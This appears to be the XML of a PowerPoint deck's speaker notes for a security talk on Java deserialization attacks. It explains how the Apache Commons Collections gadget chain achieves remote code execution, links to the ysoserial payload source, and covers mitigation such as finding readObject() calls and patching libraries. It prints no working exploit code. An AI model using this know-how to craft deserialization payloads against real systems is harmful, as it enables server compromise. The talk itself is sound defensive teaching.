            <a:t>Miles O’Brien</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3048118" y="1858295"/>
        <a:ext cx="1140860" cy="570430"/>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076B5DD-4B29-48C0-AB8E-0DDC020FE66E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/17/2016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6E37070-C09A-454D-B50F-72C7F8B5FFA3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8823204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gist.github.com/coekie/a27cc406fc9f3dc7a70d"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4870B86-E396-954B-BB21-287CB43CCC4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9220598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Truthfully there are other malicious things we can do via deserialization, and we’ll cover one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> or two at the end, but often if anything bad can be done then code execution can be done, and that’s when the door truly is wide open.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The best way to illustrate this is to look at a real example.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04870B86-E396-954B-BB21-287CB43CCC4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25586445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https://www.nds.rub.de/media/hfs/attachments/files/2010/03/hackpra09_fu_esser_php_exploits1.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://blog.nelhage.com/2011/03/exploiting-pickle/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://wouter.coekaerts.be/2011/spring-vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://websec.wordpress.com/2012/01/04/multiple-vulnerabilities-in-apache-struts2-and-property-oriented-programming-with-java/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://blog.codeclimate.com/blog/2013/01/10/rails-remote-code-execution-vulnerability-explained/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3253</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04870B86-E396-954B-BB21-287CB43CCC4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41784361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Lawrence and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Frohoff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> released a payload that leverages functions found in Apache Commons Collections a year ago at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>AppSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> California 2015.  It was tucked into a presentation along with several other attack vectors and didn’t receive a lot of attention.  Stephen Breen from Foxglove spotted it and went looking for apps where this could be exploited, and found…a couple…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This example is a little complex, but it’s relatively new and probably more interesting than dissecting a payload that’s a couple years old.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04870B86-E396-954B-BB21-287CB43CCC4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32743265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the concept is that you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> have a set of objects, and you’d like to be able to convert them into different objects sometimes.  The Transformer class allows you to define one or more functions that can be used to transform this object into the desired objects.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04870B86-E396-954B-BB21-287CB43CCC4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4766039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Taken from Apache Commons Tips and Tricks Blog</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://apachecommonstipsandtricks.blogspot.com/2009/01/examples-of-functors-transformers.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> we define a collection of strings.  Then we define a collection of integers, but we use the collect function to apply our transformer to each element.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Later at the end when we call “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>PrintIt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>” on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>intNums</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, it will dynamically convert each member of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>stringOfNumbers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> collection to an integer using our transformer.  We get 1-4 here, but we could have added different strings after the definition of these collections and when we use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>intNums</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, it would reflect the new additions.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04870B86-E396-954B-BB21-287CB43CCC4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37429005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Map Proxy provides</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> static methods for dynamic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> interfaces to be added to the object at runtime,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> which when paired with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>AnnotationInvocationHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> allows decorations to be added.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>LazyMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, decorates a map with transformers, that will be called with the get(object) function is called</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04870B86-E396-954B-BB21-287CB43CCC4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33046120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https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Decorate means that whenever</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the contents of the map are changed, the transformers are invoked.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04870B86-E396-954B-BB21-287CB43CCC4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15427988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Message for researchers is that this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is a fruitful field.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Nothing released for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>.Net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> but all the elements (serialization, reflection, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>) are present</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Andriod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> runs Java.  Intents pass serialized objects frequently but, developers are encouraged not to use Java’s default serialization method because it is slow.  Do they listen?  Are their custom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>deserializers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> safe?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86E37070-C09A-454D-B50F-72C7F8B5FFA3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6377245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Want</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to emphasize these two parts when answering the question “am I vulnerable?”.  If there is no way to get your application to process a serialized object, the payload doesn’t matter.  If there is a way to </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Building a very</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> clever bunny to get inside the application is less effective if you don’t have something unpleasant to deliver.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Sometimes, the vulnerability is interesting because of the pathway to deserialization (i.e. ruby bug), sometimes it is interesting because of the payload.  We’re going to focus primarily on payloads.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04870B86-E396-954B-BB21-287CB43CCC4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35369144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Strictly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> speaking for Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>IDS and Anti-virus software has updated with signatures for the creative commons attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04870B86-E396-954B-BB21-287CB43CCC4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41951753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Riding on the shoulders of giants here.  Not my work.  Publicizing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> because I think it is important.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86E37070-C09A-454D-B50F-72C7F8B5FFA3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4472805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Ultimately,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>deseralization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> code relies on the core function “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>readObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>()”.  If this function is never called in your Java code, you are not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>deserializing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> objects.  However, the function name is not copyrighted so an XML library or computer vision library or anything else could have a function with the same name that has nothing to do with serialization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Also, if you are using 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> party libraries or especially whole components (Jenkins?), you may not have access to their code.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04870B86-E396-954B-BB21-287CB43CCC4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32055357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Depending</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> on your environment, here are some tools you may need.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04870B86-E396-954B-BB21-287CB43CCC4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36275143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Text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> of warning says “from v3.2.2 onwards this class will throw an exception when trying to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>deserialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> an instance to prevent potential remote code execution exploits.  You must set a –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Dproperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to enable it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Non-scientific statement,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> but a number of the vulnerabilities found were with a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>dmin interfaces.  This may</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> be because admin interfaces are performing more complex tasks or maybe because developers feel like they’ll be more tightly protected and so the risk is acceptable (it could happen).  Regardless, this is more reason to ensure admin interfaces are locked down. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04870B86-E396-954B-BB21-287CB43CCC4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26864318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Really, is any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> client ever trusted?  You’re risking code execution here, so “trust” implies that the sender would be trusted to run arbitrary code on the same server with application level privileges.  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
